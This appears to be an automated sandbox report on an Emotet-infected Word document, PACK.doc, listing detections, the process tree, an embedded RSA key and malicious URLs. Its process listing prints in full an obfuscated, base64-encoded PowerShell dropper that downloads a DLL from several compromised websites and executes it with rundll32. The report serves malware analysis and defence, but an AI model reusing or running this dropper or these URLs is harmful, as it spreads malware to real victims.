Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PACK.doc

Overview

General Information

Sample Name:PACK.doc
Analysis ID:336504
MD5:d114fc2644da49f16a6be05bb0db6b08
SHA1:6b5b6a9a5291b1b564ad3005c392ff1756ceef9e
SHA256:d9687c1ca0f341d62cf664cdfe3c9741f1f48df25129df53df9ae81979e89a5d

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2320 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2632 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2420 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2356 cmdline: POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2892 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2912 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2944 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2388 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 3036 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2284 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2452 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 2644 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                  • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                    • rundll32.exe (PID: 944 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            16.2.rundll32.exe.200000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              7.2.rundll32.exe.200000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                10.2.rundll32.exe.1c0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  9.2.rundll32.exe.1d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    18.2.rundll32.exe.700000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 40 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://fnjbq.com/wp-includes/rlR/Avira URL Cloud: Label: malware
                      Source: http://wap.zhonglisc.com/wp-includes/QryCB/Avira URL Cloud: Label: malware
                      Source: http://petafilm.com/wp-admin/4m/Avira URL Cloud: Label: malware
                      Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: petafilm.comVirustotal: Detection: 6%Perma Link
                      Source: http://petafilm.comVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: PACK.docVirustotal: Detection: 30%Perma Link
                      Source: PACK.docReversingLabs: Detection: 50%
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_001F75AE CryptDecodeObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_001F109C FindFirstFileW,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: petafilm.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2101410000.00000000036D3000.00000004.00000001.sdmpString found in memory: http://petafilm.com/wp-admin/4m/
